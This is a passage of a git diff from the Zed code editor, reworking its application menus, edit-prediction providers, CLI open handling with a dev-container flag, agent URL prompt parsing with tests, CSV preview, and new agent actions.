+ restored_b + .read_with(cx, |mw, _| { + assert_eq!( + mw.project_group_keys().cloned().collect::>(), + vec![ProjectGroupKey::new(None, PathList::new(&[dir3]))] ); - } - } + assert_eq!(mw.workspaces().count(), 1); + }) + .unwrap(); } } diff --git a/crates/zed/src/zed/app_menus.rs b/crates/zed/src/zed/app_menus.rs index debcb605f222dc7c983b9d061803720df5ff727c..3edbcad2d81d63b56e777218a3db5e57a42de7bc 100644 --- a/crates/zed/src/zed/app_menus.rs +++ b/crates/zed/src/zed/app_menus.rs @@ -31,6 +31,7 @@ pub fn app_menus(cx: &mut App) -> Vec { MenuItem::action("Toggle All Docks", workspace::ToggleAllDocks), MenuItem::submenu(Menu { name: "Editor Layout".into(), + disabled: false, items: vec![ MenuItem::action("Split Up", workspace::SplitUp::default()), MenuItem::action("Split Down", workspace::SplitDown::default()), @@ -60,39 +61,31 @@ pub fn app_menus(cx: &mut App) -> Vec { vec![ Menu { name: "Zed".into(), + disabled: false, items: vec![ MenuItem::action("About Zed", zed_actions::About), MenuItem::action("Check for Updates", auto_update::Check), MenuItem::separator(), - MenuItem::submenu(Menu { - name: "Settings".into(), - items: vec![ - MenuItem::action("Open Settings", zed_actions::OpenSettings), - MenuItem::action("Open Settings File", super::OpenSettingsFile), - MenuItem::action("Open Project Settings", zed_actions::OpenProjectSettings), - MenuItem::action( - "Open Project Settings File", - super::OpenProjectSettingsFile, - ), - MenuItem::action("Open Default Settings", super::OpenDefaultSettings), - MenuItem::separator(), - MenuItem::action("Open Keymap", zed_actions::OpenKeymap), - MenuItem::action("Open Keymap File", zed_actions::OpenKeymapFile), - MenuItem::action( - "Open Default Key Bindings", - zed_actions::OpenDefaultKeymap, - ), - MenuItem::separator(), - MenuItem::action( - "Select Theme...", - zed_actions::theme_selector::Toggle::default(), - ), - MenuItem::action( - "Select Icon Theme...", - zed_actions::icon_theme_selector::Toggle::default(), - ), - 
], - }), + MenuItem::submenu(Menu::new("Settings").items([ + MenuItem::action("Open Settings", zed_actions::OpenSettings), + MenuItem::action("Open Settings File", super::OpenSettingsFile), + MenuItem::action("Open Project Settings", zed_actions::OpenProjectSettings), + MenuItem::action("Open Project Settings File", super::OpenProjectSettingsFile), + MenuItem::action("Open Default Settings", super::OpenDefaultSettings), + MenuItem::separator(), + MenuItem::action("Open Keymap", zed_actions::OpenKeymap), + MenuItem::action("Open Keymap File", zed_actions::OpenKeymapFile), + MenuItem::action("Open Default Key Bindings", zed_actions::OpenDefaultKeymap), + MenuItem::separator(), + MenuItem::action( + "Select Theme...", + zed_actions::theme_selector::Toggle::default(), + ), + MenuItem::action( + "Select Icon Theme...", + zed_actions::icon_theme_selector::Toggle::default(), + ), + ])), MenuItem::separator(), #[cfg(target_os = "macos")] MenuItem::os_submenu("Services", gpui::SystemMenuType::Services), @@ -113,6 +106,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "File".into(), + disabled: false, items: vec![ MenuItem::action("New", workspace::NewFile), MenuItem::action("New Window", workspace::NewWindow), @@ -125,7 +119,7 @@ pub fn app_menus(cx: &mut App) -> Vec { } else { "Open…" }, - workspace::Open, + workspace::Open::default(), ), MenuItem::action( "Open Recent...", @@ -160,6 +154,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "Edit".into(), + disabled: false, items: vec![ MenuItem::os_action("Undo", editor::actions::Undo, OsAction::Undo), MenuItem::os_action("Redo", editor::actions::Redo, OsAction::Redo), @@ -180,6 +175,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "Selection".into(), + disabled: false, items: vec![ MenuItem::os_action( "Select All", @@ -227,10 +223,12 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "View".into(), + disabled: false, items: view_items, }, Menu { name: "Go".into(), + disabled: 
false, items: vec![ MenuItem::action("Back", workspace::GoBack), MenuItem::action("Forward", workspace::GoForward), @@ -262,6 +260,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "Run".into(), + disabled: false, items: vec![ MenuItem::action( "Spawn Task", @@ -286,6 +285,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "Window".into(), + disabled: false, items: vec![ MenuItem::action("Minimize", super::Minimize), MenuItem::action("Zoom", super::Zoom), @@ -294,6 +294,7 @@ pub fn app_menus(cx: &mut App) -> Vec { }, Menu { name: "Help".into(), + disabled: false, items: vec![ MenuItem::action( "View Release Notes Locally", diff --git a/crates/zed/src/zed/edit_prediction_registry.rs b/crates/zed/src/zed/edit_prediction_registry.rs index 9381dae22b055b4bd008ee63d0d283581bd513f4..d09dc07af839a681cea96d43217c4217927864d5 100644 --- a/crates/zed/src/zed/edit_prediction_registry.rs +++ b/crates/zed/src/zed/edit_prediction_registry.rs @@ -2,20 +2,18 @@ use client::{Client, UserStore}; use codestral::{CodestralEditPredictionDelegate, load_codestral_api_key}; use collections::HashMap; use copilot::CopilotEditPredictionDelegate; -use edit_prediction::{EditPredictionModel, ZedEditPredictionDelegate, Zeta2FeatureFlag}; +use edit_prediction::{EditPredictionModel, ZedEditPredictionDelegate}; use editor::Editor; -use feature_flags::FeatureFlagAppExt; use gpui::{AnyWindowHandle, App, AppContext as _, Context, Entity, WeakEntity}; use language::language_settings::{EditPredictionProvider, all_language_settings}; -use settings::{ - EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME, EditPredictionPromptFormat, SettingsStore, -}; +use settings::{EditPredictionPromptFormat, SettingsStore}; use std::{cell::RefCell, rc::Rc, sync::Arc}; -use supermaven::{Supermaven, SupermavenEditPredictionDelegate}; use ui::Window; pub fn init(client: Arc, user_store: Entity, cx: &mut App) { + edit_prediction::EditPredictionStore::global(&client, &user_store, cx); + let editors: Rc, 
AnyWindowHandle>>> = Rc::default(); cx.observe_new({ let editors = editors.clone(); @@ -80,9 +78,6 @@ pub fn init(client: Arc, user_store: Entity, cx: &mut App) { .detach(); cx.observe_global::({ - let editors = editors.clone(); - let client = client.clone(); - let user_store = user_store.clone(); let mut previous_config = edit_prediction_provider_config_for_settings(cx); move |cx| { let new_provider_config = edit_prediction_provider_config_for_settings(cx); @@ -106,24 +101,6 @@ pub fn init(client: Arc, user_store: Entity, cx: &mut App) { } }) .detach(); - - cx.observe_flag::({ - let mut previous_config = edit_prediction_provider_config_for_settings(cx); - move |_is_enabled, cx| { - let new_provider_config = edit_prediction_provider_config_for_settings(cx); - if new_provider_config != previous_config { - previous_config = new_provider_config; - assign_edit_prediction_providers( - &editors, - new_provider_config, - &client, - user_store.clone(), - cx, - ); - } - } - }) - .detach(); } fn edit_prediction_provider_config_for_settings(cx: &App) -> Option { @@ -132,10 +109,9 @@ fn edit_prediction_provider_config_for_settings(cx: &App) -> Option None, EditPredictionProvider::Copilot => Some(EditPredictionProviderConfig::Copilot), - EditPredictionProvider::Supermaven => Some(EditPredictionProviderConfig::Supermaven), - EditPredictionProvider::Zed => Some(EditPredictionProviderConfig::Zed( - EditPredictionModel::Zeta1, - )), + EditPredictionProvider::Zed => { + Some(EditPredictionProviderConfig::Zed(EditPredictionModel::Zeta)) + } EditPredictionProvider::Codestral => Some(EditPredictionProviderConfig::Codestral), EditPredictionProvider::Ollama | EditPredictionProvider::OpenAiCompatibleApi => { let custom_settings = if provider == EditPredictionProvider::Ollama { @@ -154,33 +130,22 @@ fn edit_prediction_provider_config_for_settings(cx: &App) -> Option Some(EditPredictionProviderConfig::Zed( - EditPredictionModel::Sweep, - )), + EditPredictionProvider::Mercury => 
Some(EditPredictionProviderConfig::Zed( EditPredictionModel::Mercury, )), - EditPredictionProvider::Experimental(name) => { - if name == EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME - && cx.has_flag::() - { - Some(EditPredictionProviderConfig::Zed( - EditPredictionModel::Zeta2, - )) - } else { - None - } - } + EditPredictionProvider::Experimental(_) => None, } } @@ -204,7 +169,6 @@ fn infer_prompt_format(model: &str) -> Option { #[derive(Copy, Clone, PartialEq, Eq)] enum EditPredictionProviderConfig { Copilot, - Supermaven, Codestral, Zed(EditPredictionModel), } @@ -213,13 +177,10 @@ impl EditPredictionProviderConfig { fn name(&self) -> &'static str { match self { EditPredictionProviderConfig::Copilot => "Copilot", - EditPredictionProviderConfig::Supermaven => "Supermaven", EditPredictionProviderConfig::Codestral => "Codestral", EditPredictionProviderConfig::Zed(model) => match model { - EditPredictionModel::Zeta1 => "Zeta1", - EditPredictionModel::Zeta2 => "Zeta2", + EditPredictionModel::Zeta => "Zeta", EditPredictionModel::Fim { .. 
} => "FIM", - EditPredictionModel::Sweep => "Sweep", EditPredictionModel::Mercury => "Mercury", }, } @@ -306,12 +267,6 @@ fn assign_edit_prediction_provider( editor.set_edit_prediction_provider(Some(provider), window, cx); } } - Some(EditPredictionProviderConfig::Supermaven) => { - if let Some(supermaven) = Supermaven::global(cx) { - let provider = cx.new(|_| SupermavenEditPredictionDelegate::new(supermaven)); - editor.set_edit_prediction_provider(Some(provider), window, cx); - } - } Some(EditPredictionProviderConfig::Codestral) => { let http_client = client.http_client(); let provider = cx.new(|_| CodestralEditPredictionDelegate::new(http_client)); @@ -321,26 +276,23 @@ fn assign_edit_prediction_provider( let ep_store = edit_prediction::EditPredictionStore::global(client, &user_store, cx); if let Some(project) = editor.project() { - let has_model = ep_store.update(cx, |ep_store, cx| { + ep_store.update(cx, |ep_store, cx| { ep_store.set_edit_prediction_model(model); if let Some(buffer) = &singleton_buffer { ep_store.register_buffer(buffer, project, cx); } - true }); - if has_model { - let provider = cx.new(|cx| { - ZedEditPredictionDelegate::new( - project.clone(), - singleton_buffer, - &client, - &user_store, - cx, - ) - }); - editor.set_edit_prediction_provider(Some(provider), window, cx); - } + let provider = cx.new(|cx| { + ZedEditPredictionDelegate::new( + project.clone(), + singleton_buffer, + &client, + &user_store, + cx, + ) + }); + editor.set_edit_prediction_provider(Some(provider), window, cx); } } } @@ -361,7 +313,12 @@ mod tests { let app_state = cx.update(|cx| { let app_state = AppState::test(cx); client::init(&app_state.client, cx); - language_model::init(app_state.client.clone(), cx); + language_model::init(cx); + client::RefreshLlmTokenListener::register( + app_state.client.clone(), + app_state.user_store.clone(), + cx, + ); editor::init(cx); app_state }); diff --git a/crates/zed/src/zed/migrate.rs b/crates/zed/src/zed/migrate.rs index 
f8bec397f1cf54fe37962c6a318a816a3158423e..f7d320a0814f17c47298f0d903800c5a98e353f1 100644 --- a/crates/zed/src/zed/migrate.rs +++ b/crates/zed/src/zed/migrate.rs @@ -11,7 +11,7 @@ use std::sync::Arc; use gpui::{Entity, EventEmitter, Global, Task, TextStyle, TextStyleRefinement}; use markdown::{Markdown, MarkdownElement, MarkdownStyle}; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::prelude::*; use workspace::item::ItemHandle; use workspace::{ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, Workspace}; diff --git a/crates/zed/src/zed/open_listener.rs b/crates/zed/src/zed/open_listener.rs index a7d1da663b3da6848d3552707f261fe02beba56b..0a302291cacc8caa9e0618da00b8d7c6370ccf0e 100644 --- a/crates/zed/src/zed/open_listener.rs +++ b/crates/zed/src/zed/open_listener.rs @@ -1,10 +1,11 @@ use crate::handle_open_request; use crate::restore_or_create_workspace; +use agent_ui::ExternalSourcePrompt; use anyhow::{Context as _, Result, anyhow}; use cli::{CliRequest, CliResponse, ipc::IpcSender}; use cli::{IpcHandshake, ipc}; use client::{ZedLink, parse_zed_link}; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use editor::Editor; use fs::Fs; use futures::channel::mpsc::{UnboundedReceiver, UnboundedSender}; @@ -28,7 +29,7 @@ use util::ResultExt; use util::paths::PathWithPosition; use workspace::PathList; use workspace::item::ItemHandle; -use workspace::{AppState, MultiWorkspace, OpenOptions, SerializedWorkspaceLocation}; +use workspace::{AppState, MultiWorkspace, OpenOptions, OpenResult, SerializedWorkspaceLocation}; #[derive(Default, Debug)] pub struct OpenRequest { @@ -36,6 +37,7 @@ pub struct OpenRequest { pub open_paths: Vec, pub diff_paths: Vec<[String; 2]>, pub diff_all: bool, + pub dev_container: bool, pub open_channel_notes: Vec<(u64, Option)>, pub join_channel: Option, pub remote_connection: Option, @@ -48,7 +50,7 @@ pub enum OpenRequestKind { extension_id: String, }, AgentPanel { - initial_prompt: Option, + 
external_source_prompt: Option, }, SharedAgentThread { session_id: String, @@ -77,6 +79,7 @@ impl OpenRequest { this.diff_paths = request.diff_paths; this.diff_all = request.diff_all; + this.dev_container = request.dev_container; if let Some(wsl) = request.wsl { let (user, distro_name) = if let Some((user, distro)) = wsl.split_once('@') { if user.is_empty() { @@ -110,8 +113,6 @@ impl OpenRequest { this.kind = Some(OpenRequestKind::Extension { extension_id: extension_id.to_string(), }); - } else if let Some(agent_path) = url.strip_prefix("zed://agent") { - this.parse_agent_url(agent_path) } else if let Some(session_id_str) = url.strip_prefix("zed://agent/shared/") { if uuid::Uuid::parse_str(session_id_str).is_ok() { this.kind = Some(OpenRequestKind::SharedAgentThread { @@ -120,6 +121,8 @@ impl OpenRequest { } else { log::error!("Invalid session ID in URL: {}", session_id_str); } + } else if let Some(agent_path) = url.strip_prefix("zed://agent") { + this.parse_agent_url(agent_path) } else if let Some(schema_path) = url.strip_prefix("zed://schemas/") { this.kind = Some(OpenRequestKind::BuiltinJsonSchema { schema_path: schema_path.to_string(), @@ -164,13 +167,14 @@ impl OpenRequest { fn parse_agent_url(&mut self, agent_path: &str) { // Format: "" or "?prompt=" - let initial_prompt = agent_path.strip_prefix('?').and_then(|query| { + let external_source_prompt = agent_path.strip_prefix('?').and_then(|query| { url::form_urlencoded::parse(query.as_bytes()) .find_map(|(key, value)| (key == "prompt").then_some(value)) - .filter(|s| !s.is_empty()) - .map(|s| s.into_owned()) + .and_then(|prompt| ExternalSourcePrompt::new(prompt.as_ref())) + }); + self.kind = Some(OpenRequestKind::AgentPanel { + external_source_prompt, }); - self.kind = Some(OpenRequestKind::AgentPanel { initial_prompt }); } fn parse_git_clone_url(&mut self, clone_path: &str) -> Result<()> { @@ -254,6 +258,7 @@ pub struct RawOpenRequest { pub urls: Vec, pub diff_paths: Vec<[String; 2]>, pub diff_all: bool, + 
pub dev_container: bool, pub wsl: Option, } @@ -343,7 +348,11 @@ pub async fn open_paths_with_positions( .map(|path_with_position| path_with_position.path.clone()) .collect::>(); - let (multi_workspace, mut items) = cx + let OpenResult { + window: multi_workspace, + opened_items: mut items, + .. + } = cx .update(|cx| workspace::open_paths(&paths, app_state, open_options, cx)) .await?; @@ -407,6 +416,7 @@ pub async fn handle_cli_connection( reuse, env, user_data_dir: _, + dev_container, } => { if !urls.is_empty() { cx.update(|cx| { @@ -415,6 +425,7 @@ pub async fn handle_cli_connection( urls, diff_paths, diff_all, + dev_container, wsl, }, cx, @@ -444,6 +455,7 @@ pub async fn handle_cli_connection( reuse, &responses, wait, + dev_container, app_state.clone(), env, cx, @@ -465,6 +477,7 @@ async fn open_workspaces( reuse: bool, responses: &IpcSender, wait: bool, + dev_container: bool, app_state: Arc, env: Option>, cx: &mut AsyncApp, @@ -485,7 +498,8 @@ async fn open_workspaces( if grouped_locations.is_empty() { // If we have no paths to open, show the welcome screen if this is the first launch - if matches!(KEY_VALUE_STORE.read_kvp(FIRST_OPEN), Ok(None)) { + let kvp = cx.update(|cx| KeyValueStore::global(cx)); + if matches!(kvp.read_kvp(FIRST_OPEN), Ok(None)) { cx.update(|cx| show_onboarding_view(app_state, cx).detach()); } // If not the first launch, show an empty window with empty editor @@ -522,9 +536,10 @@ async fn open_workspaces( }; let open_options = workspace::OpenOptions { open_new_workspace, - replace_window, + requesting_window: replace_window, wait, env: env.clone(), + open_in_dev_container: dev_container, ..Default::default() }; @@ -772,6 +787,137 @@ mod tests { assert_eq!(request.open_paths, vec!["/"]); } + #[gpui::test] + fn test_parse_agent_url(cx: &mut TestAppContext) { + let _app_state = init_test(cx); + + let request = cx.update(|cx| { + OpenRequest::parse( + RawOpenRequest { + urls: vec!["zed://agent".into()], + ..Default::default() + }, + cx, + ) + 
.unwrap() + }); + + match request.kind { + Some(OpenRequestKind::AgentPanel { + external_source_prompt, + }) => { + assert_eq!(external_source_prompt, None); + } + _ => panic!("Expected AgentPanel kind"), + } + } + + fn agent_url_with_prompt(prompt: &str) -> String { + let mut serializer = url::form_urlencoded::Serializer::new("zed://agent?".to_string()); + serializer.append_pair("prompt", prompt); + serializer.finish() + } + + #[gpui::test] + fn test_parse_agent_url_with_prompt(cx: &mut TestAppContext) { + let _app_state = init_test(cx); + let prompt = "Write me a script\nThanks"; + + let request = cx.update(|cx| { + OpenRequest::parse( + RawOpenRequest { + urls: vec![agent_url_with_prompt(prompt)], + ..Default::default() + }, + cx, + ) + .unwrap() + }); + + match request.kind { + Some(OpenRequestKind::AgentPanel { + external_source_prompt, + }) => { + assert_eq!( + external_source_prompt + .as_ref() + .map(ExternalSourcePrompt::as_str), + Some("Write me a script\nThanks") + ); + } + _ => panic!("Expected AgentPanel kind"), + } + } + + #[gpui::test] + fn test_parse_agent_url_with_empty_prompt(cx: &mut TestAppContext) { + let _app_state = init_test(cx); + + let request = cx.update(|cx| { + OpenRequest::parse( + RawOpenRequest { + urls: vec![agent_url_with_prompt("")], + ..Default::default() + }, + cx, + ) + .unwrap() + }); + + match request.kind { + Some(OpenRequestKind::AgentPanel { + external_source_prompt, + }) => { + assert_eq!(external_source_prompt, None); + } + _ => panic!("Expected AgentPanel kind"), + } + } + + #[gpui::test] + fn test_parse_shared_agent_thread_url(cx: &mut TestAppContext) { + let _app_state = init_test(cx); + let session_id = "123e4567-e89b-12d3-a456-426614174000"; + + let request = cx.update(|cx| { + OpenRequest::parse( + RawOpenRequest { + urls: vec![format!("zed://agent/shared/{session_id}")], + ..Default::default() + }, + cx, + ) + .unwrap() + }); + + match request.kind { + Some(OpenRequestKind::SharedAgentThread { + session_id: 
parsed_session_id, + }) => { + assert_eq!(parsed_session_id, session_id); + } + _ => panic!("Expected SharedAgentThread kind"), + } + } + + #[gpui::test] + fn test_parse_shared_agent_thread_url_with_invalid_uuid(cx: &mut TestAppContext) { + let _app_state = init_test(cx); + + let request = cx.update(|cx| { + OpenRequest::parse( + RawOpenRequest { + urls: vec!["zed://agent/shared/not-a-uuid".into()], + ..Default::default() + }, + cx, + ) + .unwrap() + }); + + assert!(request.kind.is_none()); + } + #[gpui::test] fn test_parse_git_commit_url(cx: &mut TestAppContext) { let _app_state = init_test(cx); @@ -1154,7 +1300,7 @@ mod tests { vec![], false, workspace::OpenOptions { - replace_window: Some(window_to_replace), + requesting_window: Some(window_to_replace), ..Default::default() }, &response_tx, @@ -1407,4 +1553,123 @@ mod tests { }) .unwrap(); } + + #[gpui::test] + async fn test_dev_container_flag_opens_modal(cx: &mut TestAppContext) { + let app_state = init_test(cx); + cx.update(|cx| recent_projects::init(cx)); + + app_state + .fs + .as_fake() + .insert_tree( + path!("/project"), + json!({ + ".devcontainer": { + "devcontainer.json": "{}" + }, + "src": { + "main.rs": "fn main() {}" + } + }), + ) + .await; + + let (response_tx, _) = ipc::channel::().unwrap(); + let errored = cx + .spawn({ + let app_state = app_state.clone(); + |mut cx| async move { + open_local_workspace( + vec![path!("/project").to_owned()], + vec![], + false, + workspace::OpenOptions { + open_in_dev_container: true, + ..Default::default() + }, + &response_tx, + &app_state, + &mut cx, + ) + .await + } + }) + .await; + + assert!(!errored); + + let multi_workspace = cx.update(|cx| cx.windows()[0].downcast::().unwrap()); + multi_workspace + .update(cx, |multi_workspace, _, cx| { + let flag = multi_workspace.workspace().read(cx).open_in_dev_container(); + assert!( + !flag, + "open_in_dev_container flag should be consumed by suggest_on_worktree_updated" + ); + }) + .unwrap(); + } + + #[gpui::test] + 
async fn test_dev_container_flag_cleared_without_config(cx: &mut TestAppContext) { + let app_state = init_test(cx); + cx.update(|cx| recent_projects::init(cx)); + + app_state + .fs + .as_fake() + .insert_tree( + path!("/project"), + json!({ + "src": { + "main.rs": "fn main() {}" + } + }), + ) + .await; + + let (response_tx, _) = ipc::channel::().unwrap(); + let errored = cx + .spawn({ + let app_state = app_state.clone(); + |mut cx| async move { + open_local_workspace( + vec![path!("/project").to_owned()], + vec![], + false, + workspace::OpenOptions { + open_in_dev_container: true, + ..Default::default() + }, + &response_tx, + &app_state, + &mut cx, + ) + .await + } + }) + .await; + + assert!(!errored); + + // Let any pending worktree scan events and updates settle. + cx.run_until_parked(); + + // With no .devcontainer config, the flag should be cleared once the + // worktree scan completes, rather than persisting on the workspace. + let multi_workspace = cx.update(|cx| cx.windows()[0].downcast::().unwrap()); + multi_workspace + .update(cx, |multi_workspace, _, cx| { + let flag = multi_workspace + .workspace() + .read(cx) + .open_in_dev_container(); + assert!( + !flag, + "open_in_dev_container flag should be cleared when no devcontainer config exists" + ); + }) + .unwrap(); + } } diff --git a/crates/zed/src/zed/quick_action_bar/preview.rs b/crates/zed/src/zed/quick_action_bar/preview.rs index 5d43e79542357977b06fbbd884472f94ad3595c8..01e2d164d7d7a8a81e64ab77ad646111e4baacd7 100644 --- a/crates/zed/src/zed/quick_action_bar/preview.rs +++ b/crates/zed/src/zed/quick_action_bar/preview.rs @@ -1,3 +1,8 @@ +use csv_preview::{ + CsvPreviewView, OpenPreview as CsvOpenPreview, OpenPreviewToTheSide as CsvOpenPreviewToTheSide, + TabularDataPreviewFeatureFlag, +}; +use feature_flags::FeatureFlagAppExt as _; use gpui::{AnyElement, Modifiers, WeakEntity}; use markdown_preview::{ OpenPreview as MarkdownOpenPreview, OpenPreviewToTheSide as MarkdownOpenPreviewToTheSide, @@ -16,6 
+21,7 @@ use super::QuickActionBar; enum PreviewType { Markdown, Svg, + Csv, } impl QuickActionBar { @@ -35,6 +41,10 @@ impl QuickActionBar { } else if SvgPreviewView::resolve_active_item_as_svg_buffer(workspace, cx).is_some() { preview_type = Some(PreviewType::Svg); + } else if cx.has_flag::() + && CsvPreviewView::resolve_active_item_as_csv_editor(workspace, cx).is_some() + { + preview_type = Some(PreviewType::Csv); } }); } @@ -57,6 +67,13 @@ impl QuickActionBar { Box::new(SvgOpenPreviewToTheSide) as Box, &svg_preview::OpenPreview as &dyn gpui::Action, ), + PreviewType::Csv => ( + "toggle-csv-preview", + "Preview CSV", + Box::new(CsvOpenPreview) as Box, + Box::new(CsvOpenPreviewToTheSide) as Box, + &csv_preview::OpenPreview as &dyn gpui::Action, + ), }; let alt_click = gpui::Keystroke { diff --git a/crates/zed/src/zed/telemetry_log.rs b/crates/zed/src/zed/telemetry_log.rs index 06e13ef5d86fb665151b13ce01de5a60def9ba15..7df7e83d25804edb1a7a73abf055d9adaf080a90 100644 --- a/crates/zed/src/zed/telemetry_log.rs +++ b/crates/zed/src/zed/telemetry_log.rs @@ -12,11 +12,11 @@ use gpui::{ StyleRefinement, Task, TextStyleRefinement, Window, list, prelude::*, }; use language::LanguageRegistry; -use markdown::{CodeBlockRenderer, Markdown, MarkdownElement, MarkdownStyle}; +use markdown::{CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownStyle}; use project::Project; use settings::Settings; use telemetry_events::{Event, EventWrapper}; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Icon, IconButton, IconName, IconSize, Label, TextSize, Tooltip, WithScrollbar, prelude::*, }; @@ -424,8 +424,11 @@ impl TelemetryLogView { }, ) .code_block_renderer(CodeBlockRenderer::Default { - copy_button: false, - copy_button_on_hover: expanded, + copy_button_visibility: if expanded { + CopyButtonVisibility::VisibleOnHover + } else { + CopyButtonVisibility::Hidden + }, border: false, }), ), diff --git a/crates/zed/src/zed/visual_tests.rs 
b/crates/zed/src/zed/visual_tests.rs index 0aab800eaf0e8664a875751d0b1df1abce98c945..982db08782207a9bfef96ec8f17c28c8abac41f3 100644 --- a/crates/zed/src/zed/visual_tests.rs +++ b/crates/zed/src/zed/visual_tests.rs @@ -51,7 +51,7 @@ pub fn init_visual_test(cx: &mut VisualTestAppContext) -> Arc { let app_state = AppState::test(cx); gpui_tokio::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); audio::init(cx); workspace::init(app_state.clone(), cx); release_channel::init(semver::Version::new(0, 0, 0), cx); diff --git a/crates/zed/src/zed/windows_only_instance.rs b/crates/zed/src/zed/windows_only_instance.rs index 5790715bc13bdcc68d180519d9176873bd81bc50..f22f49e26a982cb8cb68e21645033819e059de36 100644 --- a/crates/zed/src/zed/windows_only_instance.rs +++ b/crates/zed/src/zed/windows_only_instance.rs @@ -162,6 +162,7 @@ fn send_args_to_instance(args: &Args) -> anyhow::Result<()> { reuse: false, env: None, user_data_dir: args.user_data_dir.clone(), + dev_container: args.dev_container, } }; diff --git a/crates/zed_actions/src/lib.rs b/crates/zed_actions/src/lib.rs index ae785bb4a0c792dd7f55d8850e8c05ce6327c108..66ccf9c41c1e1cfcb821e03b4e9b7d4803f53c0b 100644 --- a/crates/zed_actions/src/lib.rs +++ b/crates/zed_actions/src/lib.rs @@ -85,8 +85,6 @@ pub enum ExtensionCategoryFilter { LanguageServers, ContextServers, AgentServers, - SlashCommands, - IndexedDocsProviders, Snippets, DebugAdapters, } @@ -110,6 +108,12 @@ pub struct Extensions { #[serde(deny_unknown_fields)] pub struct AcpRegistry; +/// Show call diagnostics and connection quality statistics. +#[derive(PartialEq, Clone, Default, Debug, Deserialize, JsonSchema, Action)] +#[action(namespace = collab)] +#[serde(deny_unknown_fields)] +pub struct ShowCallStats; + /// Decreases the font size in the editor buffer. 
#[derive(PartialEq, Clone, Default, Debug, Deserialize, JsonSchema, Action)] #[action(namespace = zed)] @@ -191,6 +195,8 @@ pub mod editor { MoveUp, /// Moves cursor down. MoveDown, + /// Reveals the current file in the system file manager. + RevealInFileManager, ] ); } @@ -325,6 +331,12 @@ pub mod feedback { ); } +pub mod theme { + use gpui::actions; + + actions!(theme, [ToggleMode]); +} + pub mod theme_selector { use gpui::Action; use schemars::JsonSchema; @@ -438,8 +450,6 @@ pub mod agent { OpenOnboardingModal, /// Opens the ACP onboarding modal. OpenAcpOnboardingModal, - /// Opens the Claude Agent onboarding modal. - OpenClaudeAgentOnboardingModal, /// Resets the agent onboarding state. ResetOnboarding, /// Starts a chat conversation with the agent. @@ -469,6 +479,33 @@ pub mod agent { /// The base ref that the diff was computed against (e.g. "main"). pub base_ref: SharedString, } + + /// A single merge conflict region extracted from a file. + #[derive(Clone, Debug, PartialEq, Deserialize, JsonSchema)] + pub struct ConflictContent { + pub file_path: String, + pub conflict_text: String, + pub ours_branch_name: String, + pub theirs_branch_name: String, + } + + /// Opens a new agent thread to resolve specific merge conflicts. + #[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)] + #[action(namespace = agent)] + #[serde(deny_unknown_fields)] + pub struct ResolveConflictsWithAgent { + /// Individual conflicts with their full text. + pub conflicts: Vec, + } + + /// Opens a new agent thread to resolve merge conflicts in the given file paths. + #[derive(Clone, PartialEq, Deserialize, JsonSchema, Action)] + #[action(namespace = agent)] + #[serde(deny_unknown_fields)] + pub struct ResolveConflictedFilesWithAgent { + /// File paths with unresolved conflicts (for project-wide resolution). 
+ pub conflicted_file_paths: Vec, + } } pub mod assistant { @@ -487,14 +524,6 @@ pub mod assistant { ] ); - actions!( - assistant, - [ - /// Shows the assistant configuration panel. - ShowConfiguration - ] - ); - /// Opens the rules library for managing agent rules and prompts. #[derive(PartialEq, Clone, Default, Debug, Deserialize, JsonSchema, Action)] #[action(namespace = agent, deprecated_aliases = ["assistant::OpenRulesLibrary", "assistant::DeployPromptLibrary"])] @@ -737,6 +766,31 @@ pub mod preview { } } +pub mod agents_sidebar { + use gpui::{Action, actions}; + use schemars::JsonSchema; + use serde::Deserialize; + + /// Toggles the thread switcher popup when the sidebar is focused. + #[derive(PartialEq, Clone, Deserialize, JsonSchema, Default, Action)] + #[action(namespace = agents_sidebar)] + #[serde(deny_unknown_fields)] + pub struct ToggleThreadSwitcher { + #[serde(default)] + pub select_last: bool, + } + + actions!( + agents_sidebar, + [ + /// Moves focus to the sidebar's search/filter editor. + FocusSidebarFilter, + /// Moves the active workspace to a new window. 
+ MoveWorkspaceToNewWindow, + ] + ); +} + pub mod notebook { use gpui::actions; diff --git a/crates/supermaven_api/Cargo.toml b/crates/zed_credentials_provider/Cargo.toml similarity index 62% rename from crates/supermaven_api/Cargo.toml rename to crates/zed_credentials_provider/Cargo.toml index 28868a9a7433f995e99b861cf7f6e9aeeb28942f..9f64801d4664111bceb0fb7b9ee8c007977b6389 100644 --- a/crates/supermaven_api/Cargo.toml +++ b/crates/zed_credentials_provider/Cargo.toml @@ -1,5 +1,5 @@ [package] -name = "supermaven_api" +name = "zed_credentials_provider" version = "0.1.0" edition.workspace = true publish.workspace = true @@ -9,15 +9,14 @@ license = "GPL-3.0-or-later" workspace = true [lib] -path = "src/supermaven_api.rs" -doctest = false +path = "src/zed_credentials_provider.rs" [dependencies] anyhow.workspace = true +credentials_provider.workspace = true futures.workspace = true -http_client.workspace = true +gpui.workspace = true paths.workspace = true +release_channel.workspace = true serde.workspace = true serde_json.workspace = true -smol.workspace = true -util.workspace = true diff --git a/crates/zed_credentials_provider/LICENSE-GPL b/crates/zed_credentials_provider/LICENSE-GPL new file mode 120000 index 0000000000000000000000000000000000000000..89e542f750cd3860a0598eff0dc34b56d7336dc4 --- /dev/null +++ b/crates/zed_credentials_provider/LICENSE-GPL @@ -0,0 +1 @@ +../../LICENSE-GPL \ No newline at end of file diff --git a/crates/zed_credentials_provider/src/zed_credentials_provider.rs b/crates/zed_credentials_provider/src/zed_credentials_provider.rs new file mode 100644 index 0000000000000000000000000000000000000000..6705e58d400b1a66990f2451d318b5950ea08dde --- 